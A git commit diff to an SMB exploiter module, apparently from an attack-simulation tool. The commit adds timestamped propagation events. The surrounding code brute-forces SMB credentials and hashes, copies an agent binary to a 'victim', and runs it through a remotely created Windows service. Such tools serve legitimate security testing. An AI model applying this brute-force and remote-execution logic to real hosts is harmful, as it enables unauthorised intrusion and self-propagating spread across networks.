Agent: Publish propagation events
This commit is contained in:
parent
c631755397
commit
7b13817b66
|
@ -69,7 +69,7 @@ class SMBExploiter(HostExploiter):
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
|
|
||||||
dest_path = get_agent_dst_path(self.host)
|
dest_path = get_agent_dst_path(self.host)
|
||||||
remote_full_path, creds = self._exploit(dest_path)
|
remote_full_path, creds, timestamp = self._exploit(dest_path)
|
||||||
|
|
||||||
if not self.exploit_result.exploitation_success:
|
if not self.exploit_result.exploitation_success:
|
||||||
if self._is_interrupted():
|
if self._is_interrupted():
|
||||||
|
@ -93,7 +93,7 @@ class SMBExploiter(HostExploiter):
|
||||||
|
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
self._run_agent_on_victim(scmr_rpc, cmdline)
|
self._run_agent_on_victim(scmr_rpc, cmdline, timestamp)
|
||||||
|
|
||||||
logger.info(
|
logger.info(
|
||||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
@ -112,7 +112,7 @@ class SMBExploiter(HostExploiter):
|
||||||
)
|
)
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials]:
|
def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials, float]:
|
||||||
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
||||||
creds = generate_brute_force_combinations(self.options["credentials"])
|
creds = generate_brute_force_combinations(self.options["credentials"])
|
||||||
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
|
for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt):
|
||||||
|
@ -163,7 +163,7 @@ class SMBExploiter(HostExploiter):
|
||||||
self._publish_exploitation_event(timestamp, False, error_message=message)
|
self._publish_exploitation_event(timestamp, False, error_message=message)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash)
|
return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash), timestamp
|
||||||
|
|
||||||
def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str:
|
def _get_agent_command(self, remote_full_path: str, dest_path: PurePath) -> str:
|
||||||
if remote_full_path.lower() != str(dest_path).lower():
|
if remote_full_path.lower() != str(dest_path).lower():
|
||||||
|
@ -220,7 +220,7 @@ class SMBExploiter(HostExploiter):
|
||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str):
|
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str, start_time: float):
|
||||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||||
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
||||||
sc_handle = resp["lpScHandle"]
|
sc_handle = resp["lpScHandle"]
|
||||||
|
@ -239,15 +239,19 @@ class SMBExploiter(HostExploiter):
|
||||||
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
||||||
else:
|
else:
|
||||||
self.exploit_result.error_message = str(err)
|
self.exploit_result.error_message = str(err)
|
||||||
return self.exploit_result
|
self._publish_propagation_event(start_time, False, error_message=str(err))
|
||||||
|
return
|
||||||
|
|
||||||
service = resp["lpServiceHandle"]
|
service = resp["lpServiceHandle"]
|
||||||
try:
|
try:
|
||||||
scmr.hRStartServiceW(scmr_rpc, service)
|
scmr.hRStartServiceW(scmr_rpc, service)
|
||||||
|
self._publish_propagation_event(start_time, True)
|
||||||
status = ScanStatus.USED
|
status = ScanStatus.USED
|
||||||
except Exception:
|
except Exception:
|
||||||
|
message = "Failed to start the service"
|
||||||
|
self._publish_propagation_event(start_time, False, error_message=message)
|
||||||
status = ScanStatus.SCANNED
|
status = ScanStatus.SCANNED
|
||||||
pass
|
|
||||||
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
||||||
scmr.hRDeleteService(scmr_rpc, service)
|
scmr.hRDeleteService(scmr_rpc, service)
|
||||||
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
||||||
|
|
Loading…
Reference in New Issue